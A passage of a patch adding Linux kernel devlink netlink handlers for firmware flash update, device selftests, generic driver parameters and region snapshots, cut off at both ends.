++				       struct genl_info *info)
++{
++	struct nlattr *nla_overwrite_mask, *nla_file_name;
++	struct devlink_flash_update_params params = {};
++	struct devlink *devlink = info->user_ptr[0];
++	const char *file_name;
++	u32 supported_params;
++	int ret;
++
++	if (!devlink->ops->flash_update)
++		return -EOPNOTSUPP;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_FLASH_UPDATE_FILE_NAME))
++		return -EINVAL;
++
++	ret = devlink_flash_component_get(devlink,
++					  info->attrs[DEVLINK_ATTR_FLASH_UPDATE_COMPONENT],
++					  &params.component, info->extack);
++	if (ret)
++		return ret;
++
++	supported_params = devlink->ops->supported_flash_update_params;
++
++	nla_overwrite_mask = info->attrs[DEVLINK_ATTR_FLASH_UPDATE_OVERWRITE_MASK];
++	if (nla_overwrite_mask) {
++		struct nla_bitfield32 sections;
++
++		if (!(supported_params & DEVLINK_SUPPORT_FLASH_UPDATE_OVERWRITE_MASK)) {
++			NL_SET_ERR_MSG_ATTR(info->extack, nla_overwrite_mask,
++					    "overwrite settings are not supported by this device");
++			return -EOPNOTSUPP;
++		}
++		sections = nla_get_bitfield32(nla_overwrite_mask);
++		params.overwrite_mask = sections.value & sections.selector;
++	}
++
++	nla_file_name = info->attrs[DEVLINK_ATTR_FLASH_UPDATE_FILE_NAME];
++	file_name = nla_data(nla_file_name);
++	ret = request_firmware(&params.fw, file_name, devlink->dev);
++	if (ret) {
++		NL_SET_ERR_MSG_ATTR(info->extack, nla_file_name, "failed to locate the requested firmware file");
++		return ret;
++	}
++
++	devlink_flash_update_begin_notify(devlink);
++	ret = devlink->ops->flash_update(devlink, &params, info->extack);
++	devlink_flash_update_end_notify(devlink);
++
++	release_firmware(params.fw);
++
++	return ret;
++}
++
++static int
++devlink_nl_selftests_fill(struct sk_buff *msg, struct devlink *devlink,
++			  u32 portid, u32 seq, int flags,
++			  struct netlink_ext_ack *extack)
++{
++	struct nlattr *selftests;
++	void *hdr;
++	int err;
++	int i;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags,
++			  DEVLINK_CMD_SELFTESTS_GET);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	err = -EMSGSIZE;
++	if (devlink_nl_put_handle(msg, devlink))
++		goto err_cancel_msg;
++
++	selftests = nla_nest_start(msg, DEVLINK_ATTR_SELFTESTS);
++	if (!selftests)
++		goto err_cancel_msg;
++
++	for (i = DEVLINK_ATTR_SELFTEST_ID_UNSPEC + 1;
++	     i <= DEVLINK_ATTR_SELFTEST_ID_MAX; i++) {
++		if (devlink->ops->selftest_check(devlink, i, extack)) {
++			err = nla_put_flag(msg, i);
++			if (err)
++				goto err_cancel_msg;
++		}
++	}
++
++	nla_nest_end(msg, selftests);
++	genlmsg_end(msg, hdr);
++	return 0;
++
++err_cancel_msg:
++	genlmsg_cancel(msg, hdr);
++	return err;
++}
++
++static int devlink_nl_cmd_selftests_get_doit(struct sk_buff *skb,
++					     struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct sk_buff *msg;
++	int err;
++
++	if (!devlink->ops->selftest_check)
++		return -EOPNOTSUPP;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_selftests_fill(msg, devlink, info->snd_portid,
++					info->snd_seq, 0, info->extack);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_nl_cmd_selftests_get_dumpit(struct sk_buff *msg,
++					       struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		if (idx < start || !devlink->ops->selftest_check)
++			goto inc;
++
++		devl_lock(devlink);
++		err = devlink_nl_selftests_fill(msg, devlink,
++						NETLINK_CB(cb->skb).portid,
++						cb->nlh->nlmsg_seq, NLM_F_MULTI,
++						cb->extack);
++		devl_unlock(devlink);
++		if (err) {
++			devlink_put(devlink);
++			break;
++		}
++inc:
++		idx++;
++		devlink_put(devlink);
++	}
++
++	if (err != -EMSGSIZE)
++		return err;
++
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_selftest_result_put(struct sk_buff *skb, unsigned int id,
++				       enum devlink_selftest_status test_status)
++{
++	struct nlattr *result_attr;
++
++	result_attr = nla_nest_start(skb, DEVLINK_ATTR_SELFTEST_RESULT);
++	if (!result_attr)
++		return -EMSGSIZE;
++
++	if (nla_put_u32(skb, DEVLINK_ATTR_SELFTEST_RESULT_ID, id) ||
++	    nla_put_u8(skb, DEVLINK_ATTR_SELFTEST_RESULT_STATUS,
++		       test_status))
++		goto nla_put_failure;
++
++	nla_nest_end(skb, result_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(skb, result_attr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_selftests_run(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct nlattr *tb[DEVLINK_ATTR_SELFTEST_ID_MAX + 1];
++	struct devlink *devlink = info->user_ptr[0];
++	struct nlattr *attrs, *selftests;
++	struct sk_buff *msg;
++	void *hdr;
++	int err;
++	int i;
++
++	if (!devlink->ops->selftest_run || !devlink->ops->selftest_check)
++		return -EOPNOTSUPP;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SELFTESTS))
++		return -EINVAL;
++
++	attrs = info->attrs[DEVLINK_ATTR_SELFTESTS];
++
++	err = nla_parse_nested(tb, DEVLINK_ATTR_SELFTEST_ID_MAX, attrs,
++			       devlink_selftest_nl_policy, info->extack);
++	if (err < 0)
++		return err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = -EMSGSIZE;
++	hdr = genlmsg_put(msg, info->snd_portid, info->snd_seq,
++			  &devlink_nl_family, 0, DEVLINK_CMD_SELFTESTS_RUN);
++	if (!hdr)
++		goto free_msg;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto genlmsg_cancel;
++
++	selftests = nla_nest_start(msg, DEVLINK_ATTR_SELFTESTS);
++	if (!selftests)
++		goto genlmsg_cancel;
++
++	for (i = DEVLINK_ATTR_SELFTEST_ID_UNSPEC + 1;
++	     i <= DEVLINK_ATTR_SELFTEST_ID_MAX; i++) {
++		enum devlink_selftest_status test_status;
++
++		if (nla_get_flag(tb[i])) {
++			if (!devlink->ops->selftest_check(devlink, i,
++							  info->extack)) {
++				if (devlink_selftest_result_put(msg, i,
++								DEVLINK_SELFTEST_STATUS_SKIP))
++					goto selftests_nest_cancel;
++				continue;
++			}
++
++			test_status = devlink->ops->selftest_run(devlink, i,
++								 info->extack);
++			if (devlink_selftest_result_put(msg, i, test_status))
++				goto selftests_nest_cancel;
++		}
++	}
++
++	nla_nest_end(msg, selftests);
++	genlmsg_end(msg, hdr);
++	return genlmsg_reply(msg, info);
++
++selftests_nest_cancel:
++	nla_nest_cancel(msg, selftests);
++genlmsg_cancel:
++	genlmsg_cancel(msg, hdr);
++free_msg:
++	nlmsg_free(msg);
++	return err;
++}
++
++static const struct devlink_param devlink_param_generic[] = {
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_INT_ERR_RESET,
++		.name = DEVLINK_PARAM_GENERIC_INT_ERR_RESET_NAME,
++		.type = DEVLINK_PARAM_GENERIC_INT_ERR_RESET_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_MAX_MACS,
++		.name = DEVLINK_PARAM_GENERIC_MAX_MACS_NAME,
++		.type = DEVLINK_PARAM_GENERIC_MAX_MACS_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_SRIOV,
++		.name = DEVLINK_PARAM_GENERIC_ENABLE_SRIOV_NAME,
++		.type = DEVLINK_PARAM_GENERIC_ENABLE_SRIOV_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_REGION_SNAPSHOT,
++		.name = DEVLINK_PARAM_GENERIC_REGION_SNAPSHOT_NAME,
++		.type = DEVLINK_PARAM_GENERIC_REGION_SNAPSHOT_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_IGNORE_ARI,
++		.name = DEVLINK_PARAM_GENERIC_IGNORE_ARI_NAME,
++		.type = DEVLINK_PARAM_GENERIC_IGNORE_ARI_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_MSIX_VEC_PER_PF_MAX,
++		.name = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MAX_NAME,
++		.type = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MAX_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_MSIX_VEC_PER_PF_MIN,
++		.name = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MIN_NAME,
++		.type = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MIN_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_FW_LOAD_POLICY,
++		.name = DEVLINK_PARAM_GENERIC_FW_LOAD_POLICY_NAME,
++		.type = DEVLINK_PARAM_GENERIC_FW_LOAD_POLICY_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_RESET_DEV_ON_DRV_PROBE,
++		.name = DEVLINK_PARAM_GENERIC_RESET_DEV_ON_DRV_PROBE_NAME,
++		.type = DEVLINK_PARAM_GENERIC_RESET_DEV_ON_DRV_PROBE_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_ROCE,
++		.name = DEVLINK_PARAM_GENERIC_ENABLE_ROCE_NAME,
++		.type = DEVLINK_PARAM_GENERIC_ENABLE_ROCE_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_REMOTE_DEV_RESET,
++		.name = DEVLINK_PARAM_GENERIC_ENABLE_REMOTE_DEV_RESET_NAME,
++		.type = DEVLINK_PARAM_GENERIC_ENABLE_REMOTE_DEV_RESET_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_ETH,
++		.name = DEVLINK_PARAM_GENERIC_ENABLE_ETH_NAME,
++		.type = DEVLINK_PARAM_GENERIC_ENABLE_ETH_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_RDMA,
++		.name = DEVLINK_PARAM_GENERIC_ENABLE_RDMA_NAME,
++		.type = DEVLINK_PARAM_GENERIC_ENABLE_RDMA_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_VNET,
++		.name = DEVLINK_PARAM_GENERIC_ENABLE_VNET_NAME,
++		.type = DEVLINK_PARAM_GENERIC_ENABLE_VNET_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_IWARP,
++		.name = DEVLINK_PARAM_GENERIC_ENABLE_IWARP_NAME,
++		.type = DEVLINK_PARAM_GENERIC_ENABLE_IWARP_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_IO_EQ_SIZE,
++		.name = DEVLINK_PARAM_GENERIC_IO_EQ_SIZE_NAME,
++		.type = DEVLINK_PARAM_GENERIC_IO_EQ_SIZE_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_EVENT_EQ_SIZE,
++		.name = DEVLINK_PARAM_GENERIC_EVENT_EQ_SIZE_NAME,
++		.type = DEVLINK_PARAM_GENERIC_EVENT_EQ_SIZE_TYPE,
++	},
++};
++
++static int devlink_param_generic_verify(const struct devlink_param *param)
++{
++	/* verify it match generic parameter by id and name */
++	if (param->id > DEVLINK_PARAM_GENERIC_ID_MAX)
++		return -EINVAL;
++	if (strcmp(param->name, devlink_param_generic[param->id].name))
++		return -ENOENT;
++
++	WARN_ON(param->type != devlink_param_generic[param->id].type);
++
++	return 0;
++}
++
++static int devlink_param_driver_verify(const struct devlink_param *param)
++{
++	int i;
++
++	if (param->id <= DEVLINK_PARAM_GENERIC_ID_MAX)
++		return -EINVAL;
++	/* verify no such name in generic params */
++	for (i = 0; i <= DEVLINK_PARAM_GENERIC_ID_MAX; i++)
++		if (!strcmp(param->name, devlink_param_generic[i].name))
++			return -EEXIST;
++
++	return 0;
++}
++
++static struct devlink_param_item *
++devlink_param_find_by_name(struct list_head *param_list,
++			   const char *param_name)
++{
++	struct devlink_param_item *param_item;
++
++	list_for_each_entry(param_item, param_list, list)
++		if (!strcmp(param_item->param->name, param_name))
++			return param_item;
++	return NULL;
++}
++
++static struct devlink_param_item *
++devlink_param_find_by_id(struct list_head *param_list, u32 param_id)
++{
++	struct devlink_param_item *param_item;
++
++	list_for_each_entry(param_item, param_list, list)
++		if (param_item->param->id == param_id)
++			return param_item;
++	return NULL;
++}
++
++static bool
++devlink_param_cmode_is_supported(const struct devlink_param *param,
++				 enum devlink_param_cmode cmode)
++{
++	return test_bit(cmode, &param->supported_cmodes);
++}
++
++static int devlink_param_get(struct devlink *devlink,
++			     const struct devlink_param *param,
++			     struct devlink_param_gset_ctx *ctx)
++{
++	if (!param->get || devlink->reload_failed)
++		return -EOPNOTSUPP;
++	return param->get(devlink, param->id, ctx);
++}
++
++static int devlink_param_set(struct devlink *devlink,
++			     const struct devlink_param *param,
++			     struct devlink_param_gset_ctx *ctx)
++{
++	if (!param->set || devlink->reload_failed)
++		return -EOPNOTSUPP;
++	return param->set(devlink, param->id, ctx);
++}
++
++static int
++devlink_param_type_to_nla_type(enum devlink_param_type param_type)
++{
++	switch (param_type) {
++	case DEVLINK_PARAM_TYPE_U8:
++		return NLA_U8;
++	case DEVLINK_PARAM_TYPE_U16:
++		return NLA_U16;
++	case DEVLINK_PARAM_TYPE_U32:
++		return NLA_U32;
++	case DEVLINK_PARAM_TYPE_STRING:
++		return NLA_STRING;
++	case DEVLINK_PARAM_TYPE_BOOL:
++		return NLA_FLAG;
++	default:
++		return -EINVAL;
++	}
++}
++
++static int
++devlink_nl_param_value_fill_one(struct sk_buff *msg,
++				enum devlink_param_type type,
++				enum devlink_param_cmode cmode,
++				union devlink_param_value val)
++{
++	struct nlattr *param_value_attr;
++
++	param_value_attr = nla_nest_start_noflag(msg,
++						 DEVLINK_ATTR_PARAM_VALUE);
++	if (!param_value_attr)
++		goto nla_put_failure;
++
++	if (nla_put_u8(msg, DEVLINK_ATTR_PARAM_VALUE_CMODE, cmode))
++		goto value_nest_cancel;
++
++	switch (type) {
++	case DEVLINK_PARAM_TYPE_U8:
++		if (nla_put_u8(msg, DEVLINK_ATTR_PARAM_VALUE_DATA, val.vu8))
++			goto value_nest_cancel;
++		break;
++	case DEVLINK_PARAM_TYPE_U16:
++		if (nla_put_u16(msg, DEVLINK_ATTR_PARAM_VALUE_DATA, val.vu16))
++			goto value_nest_cancel;
++		break;
++	case DEVLINK_PARAM_TYPE_U32:
++		if (nla_put_u32(msg, DEVLINK_ATTR_PARAM_VALUE_DATA, val.vu32))
++			goto value_nest_cancel;
++		break;
++	case DEVLINK_PARAM_TYPE_STRING:
++		if (nla_put_string(msg, DEVLINK_ATTR_PARAM_VALUE_DATA,
++				   val.vstr))
++			goto value_nest_cancel;
++		break;
++	case DEVLINK_PARAM_TYPE_BOOL:
++		if (val.vbool &&
++		    nla_put_flag(msg, DEVLINK_ATTR_PARAM_VALUE_DATA))
++			goto value_nest_cancel;
++		break;
++	}
++
++	nla_nest_end(msg, param_value_attr);
++	return 0;
++
++value_nest_cancel:
++	nla_nest_cancel(msg, param_value_attr);
++nla_put_failure:
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_param_fill(struct sk_buff *msg, struct devlink *devlink,
++				 unsigned int port_index,
++				 struct devlink_param_item *param_item,
++				 enum devlink_command cmd,
++				 u32 portid, u32 seq, int flags)
++{
++	union devlink_param_value param_value[DEVLINK_PARAM_CMODE_MAX + 1];
++	bool param_value_set[DEVLINK_PARAM_CMODE_MAX + 1] = {};
++	const struct devlink_param *param = param_item->param;
++	struct devlink_param_gset_ctx ctx;
++	struct nlattr *param_values_list;
++	struct nlattr *param_attr;
++	int nla_type;
++	void *hdr;
++	int err;
++	int i;
++
++	/* Get value from driver part to driverinit configuration mode */
++	for (i = 0; i <= DEVLINK_PARAM_CMODE_MAX; i++) {
++		if (!devlink_param_cmode_is_supported(param, i))
++			continue;
++		if (i == DEVLINK_PARAM_CMODE_DRIVERINIT) {
++			if (!param_item->driverinit_value_valid)
++				return -EOPNOTSUPP;
++			param_value[i] = param_item->driverinit_value;
++		} else {
++			ctx.cmode = i;
++			err = devlink_param_get(devlink, param, &ctx);
++			if (err)
++				return err;
++			param_value[i] = ctx.val;
++		}
++		param_value_set[i] = true;
++	}
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto genlmsg_cancel;
++
++	if (cmd == DEVLINK_CMD_PORT_PARAM_GET ||
++	    cmd == DEVLINK_CMD_PORT_PARAM_NEW ||
++	    cmd == DEVLINK_CMD_PORT_PARAM_DEL)
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, port_index))
++			goto genlmsg_cancel;
++
++	param_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_PARAM);
++	if (!param_attr)
++		goto genlmsg_cancel;
++	if (nla_put_string(msg, DEVLINK_ATTR_PARAM_NAME, param->name))
++		goto param_nest_cancel;
++	if (param->generic && nla_put_flag(msg, DEVLINK_ATTR_PARAM_GENERIC))
++		goto param_nest_cancel;
++
++	nla_type = devlink_param_type_to_nla_type(param->type);
++	if (nla_type < 0)
++		goto param_nest_cancel;
++	if (nla_put_u8(msg, DEVLINK_ATTR_PARAM_TYPE, nla_type))
++		goto param_nest_cancel;
++
++	param_values_list = nla_nest_start_noflag(msg,
++						  DEVLINK_ATTR_PARAM_VALUES_LIST);
++	if (!param_values_list)
++		goto param_nest_cancel;
++
++	for (i = 0; i <= DEVLINK_PARAM_CMODE_MAX; i++) {
++		if (!param_value_set[i])
++			continue;
++		err = devlink_nl_param_value_fill_one(msg, param->type,
++						      i, param_value[i]);
++		if (err)
++			goto values_list_nest_cancel;
++	}
++
++	nla_nest_end(msg, param_values_list);
++	nla_nest_end(msg, param_attr);
++	genlmsg_end(msg, hdr);
++	return 0;
++
++values_list_nest_cancel:
++	nla_nest_end(msg, param_values_list);
++param_nest_cancel:
++	nla_nest_cancel(msg, param_attr);
++genlmsg_cancel:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static void devlink_param_notify(struct devlink *devlink,
++				 unsigned int port_index,
++				 struct devlink_param_item *param_item,
++				 enum devlink_command cmd)
++{
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON(cmd != DEVLINK_CMD_PARAM_NEW && cmd != DEVLINK_CMD_PARAM_DEL &&
++		cmd != DEVLINK_CMD_PORT_PARAM_NEW &&
++		cmd != DEVLINK_CMD_PORT_PARAM_DEL);
++	ASSERT_DEVLINK_REGISTERED(devlink);
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++	err = devlink_nl_param_fill(msg, devlink, port_index, param_item, cmd,
++				    0, 0, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
++				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static int devlink_nl_cmd_param_get_dumpit(struct sk_buff *msg,
++					   struct netlink_callback *cb)
++{
++	struct devlink_param_item *param_item;
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(param_item, &devlink->param_list, list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_param_fill(msg, devlink, 0, param_item,
++						    DEVLINK_CMD_PARAM_GET,
++						    NETLINK_CB(cb->skb).portid,
++						    cb->nlh->nlmsg_seq,
++						    NLM_F_MULTI);
++			if (err == -EOPNOTSUPP) {
++				err = 0;
++			} else if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	if (err != -EMSGSIZE)
++		return err;
++
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int
++devlink_param_type_get_from_info(struct genl_info *info,
++				 enum devlink_param_type *param_type)
++{
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PARAM_TYPE))
++		return -EINVAL;
++
++	switch (nla_get_u8(info->attrs[DEVLINK_ATTR_PARAM_TYPE])) {
++	case NLA_U8:
++		*param_type = DEVLINK_PARAM_TYPE_U8;
++		break;
++	case NLA_U16:
++		*param_type = DEVLINK_PARAM_TYPE_U16;
++		break;
++	case NLA_U32:
++		*param_type = DEVLINK_PARAM_TYPE_U32;
++		break;
++	case NLA_STRING:
++		*param_type = DEVLINK_PARAM_TYPE_STRING;
++		break;
++	case NLA_FLAG:
++		*param_type = DEVLINK_PARAM_TYPE_BOOL;
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++static int
++devlink_param_value_get_from_info(const struct devlink_param *param,
++				  struct genl_info *info,
++				  union devlink_param_value *value)
++{
++	struct nlattr *param_data;
++	int len;
++
++	param_data = info->attrs[DEVLINK_ATTR_PARAM_VALUE_DATA];
++
++	if (param->type != DEVLINK_PARAM_TYPE_BOOL && !param_data)
++		return -EINVAL;
++
++	switch (param->type) {
++	case DEVLINK_PARAM_TYPE_U8:
++		if (nla_len(param_data) != sizeof(u8))
++			return -EINVAL;
++		value->vu8 = nla_get_u8(param_data);
++		break;
++	case DEVLINK_PARAM_TYPE_U16:
++		if (nla_len(param_data) != sizeof(u16))
++			return -EINVAL;
++		value->vu16 = nla_get_u16(param_data);
++		break;
++	case DEVLINK_PARAM_TYPE_U32:
++		if (nla_len(param_data) != sizeof(u32))
++			return -EINVAL;
++		value->vu32 = nla_get_u32(param_data);
++		break;
++	case DEVLINK_PARAM_TYPE_STRING:
++		len = strnlen(nla_data(param_data), nla_len(param_data));
++		if (len == nla_len(param_data) ||
++		    len >= __DEVLINK_PARAM_MAX_STRING_VALUE)
++			return -EINVAL;
++		strcpy(value->vstr, nla_data(param_data));
++		break;
++	case DEVLINK_PARAM_TYPE_BOOL:
++		if (param_data && nla_len(param_data))
++			return -EINVAL;
++		value->vbool = nla_get_flag(param_data);
++		break;
++	}
++	return 0;
++}
++
++static struct devlink_param_item *
++devlink_param_get_from_info(struct list_head *param_list,
++			    struct genl_info *info)
++{
++	char *param_name;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PARAM_NAME))
++		return NULL;
++
++	param_name = nla_data(info->attrs[DEVLINK_ATTR_PARAM_NAME]);
++	return devlink_param_find_by_name(param_list, param_name);
++}
++
++static int devlink_nl_cmd_param_get_doit(struct sk_buff *skb,
++					 struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_param_item *param_item;
++	struct sk_buff *msg;
++	int err;
++
++	param_item = devlink_param_get_from_info(&devlink->param_list, info);
++	if (!param_item)
++		return -EINVAL;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_param_fill(msg, devlink, 0, param_item,
++				    DEVLINK_CMD_PARAM_GET,
++				    info->snd_portid, info->snd_seq, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int __devlink_nl_cmd_param_set_doit(struct devlink *devlink,
++					   unsigned int port_index,
++					   struct list_head *param_list,
++					   struct genl_info *info,
++					   enum devlink_command cmd)
++{
++	enum devlink_param_type param_type;
++	struct devlink_param_gset_ctx ctx;
++	enum devlink_param_cmode cmode;
++	struct devlink_param_item *param_item;
++	const struct devlink_param *param;
++	union devlink_param_value value;
++	int err = 0;
++
++	param_item = devlink_param_get_from_info(param_list, info);
++	if (!param_item)
++		return -EINVAL;
++	param = param_item->param;
++	err = devlink_param_type_get_from_info(info, &param_type);
++	if (err)
++		return err;
++	if (param_type != param->type)
++		return -EINVAL;
++	err = devlink_param_value_get_from_info(param, info, &value);
++	if (err)
++		return err;
++	if (param->validate) {
++		err = param->validate(devlink, param->id, value, info->extack);
++		if (err)
++			return err;
++	}
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PARAM_VALUE_CMODE))
++		return -EINVAL;
++	cmode = nla_get_u8(info->attrs[DEVLINK_ATTR_PARAM_VALUE_CMODE]);
++	if (!devlink_param_cmode_is_supported(param, cmode))
++		return -EOPNOTSUPP;
++
++	if (cmode == DEVLINK_PARAM_CMODE_DRIVERINIT) {
++		if (param->type == DEVLINK_PARAM_TYPE_STRING)
++			strcpy(param_item->driverinit_value.vstr, value.vstr);
++		else
++			param_item->driverinit_value = value;
++		param_item->driverinit_value_valid = true;
++	} else {
++		if (!param->set)
++			return -EOPNOTSUPP;
++		ctx.val = value;
++		ctx.cmode = cmode;
++		err = devlink_param_set(devlink, param, &ctx);
++		if (err)
++			return err;
++	}
++
++	devlink_param_notify(devlink, port_index, param_item, cmd);
++	return 0;
++}
++
++static int devlink_nl_cmd_param_set_doit(struct sk_buff *skb,
++					 struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++
++	return __devlink_nl_cmd_param_set_doit(devlink, 0, &devlink->param_list,
++					       info, DEVLINK_CMD_PARAM_NEW);
++}
++
++static int devlink_nl_cmd_port_param_get_dumpit(struct sk_buff *msg,
++						struct netlink_callback *cb)
++{
++	NL_SET_ERR_MSG_MOD(cb->extack, "Port params are not supported");
++	return msg->len;
++}
++
++static int devlink_nl_cmd_port_param_get_doit(struct sk_buff *skb,
++					      struct genl_info *info)
++{
++	NL_SET_ERR_MSG_MOD(info->extack, "Port params are not supported");
++	return -EINVAL;
++}
++
++static int devlink_nl_cmd_port_param_set_doit(struct sk_buff *skb,
++					      struct genl_info *info)
++{
++	NL_SET_ERR_MSG_MOD(info->extack, "Port params are not supported");
++	return -EINVAL;
++}
++
++static int devlink_nl_region_snapshot_id_put(struct sk_buff *msg,
++					     struct devlink *devlink,
++					     struct devlink_snapshot *snapshot)
++{
++	struct nlattr *snap_attr;
++	int err;
++
++	snap_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_REGION_SNAPSHOT);
++	if (!snap_attr)
++		return -EINVAL;
++
++	err = nla_put_u32(msg, DEVLINK_ATTR_REGION_SNAPSHOT_ID, snapshot->id);
++	if (err)
++		goto nla_put_failure;
++
++	nla_nest_end(msg, snap_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, snap_attr);
++	return err;
++}
++
++static int devlink_nl_region_snapshots_id_put(struct sk_buff *msg,
++					      struct devlink *devlink,
++					      struct devlink_region *region)
++{
++	struct devlink_snapshot *snapshot;
++	struct nlattr *snapshots_attr;
++	int err;
++
++	snapshots_attr = nla_nest_start_noflag(msg,
++					       DEVLINK_ATTR_REGION_SNAPSHOTS);
++	if (!snapshots_attr)
++		return -EINVAL;
++
++	list_for_each_entry(snapshot, &region->snapshot_list, list) {
++		err = devlink_nl_region_snapshot_id_put(msg, devlink, snapshot);
++		if (err)
++			goto nla_put_failure;
++	}
++
++	nla_nest_end(msg, snapshots_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, snapshots_attr);
++	return err;
++}
++
++static int devlink_nl_region_fill(struct sk_buff *msg, struct devlink *devlink,
++				  enum devlink_command cmd, u32 portid,
++				  u32 seq, int flags,
++				  struct devlink_region *region)
++{
++	void *hdr;
++	int err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	err = devlink_nl_put_handle(msg, devlink);
++	if (err)
++		goto nla_put_failure;
++
++	if (region->port) {
++		err = nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX,
++				  region->port->index);
++		if (err)
++			goto nla_put_failure;
++	}
++
++	err = nla_put_string(msg, DEVLINK_ATTR_REGION_NAME, region->ops->name);
++	if (err)
++		goto nla_put_failure;
++
++	err = nla_put_u64_64bit(msg, DEVLINK_ATTR_REGION_SIZE,
++				region->size,
++				DEVLINK_ATTR_PAD);
++	if (err)
++		goto nla_put_failure;
++
++	err = nla_put_u32(msg, DEVLINK_ATTR_REGION_MAX_SNAPSHOTS,
++			  region->max_snapshots);
++	if (err)
++		goto nla_put_failure;
++
++	err = devlink_nl_region_snapshots_id_put(msg, devlink, region);
++	if (err)
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return err;
++}
++
++static struct sk_buff *
++devlink_nl_region_notify_build(struct devlink_region *region,
++			       struct devlink_snapshot *snapshot,
++			       enum devlink_command cmd, u32 portid, u32 seq)
++{
++	struct devlink *devlink = region->devlink;
++	struct sk_buff *msg;
++	void *hdr;
++	int err;
++
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return ERR_PTR(-ENOMEM);
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, 0, cmd);
++	if (!hdr) {
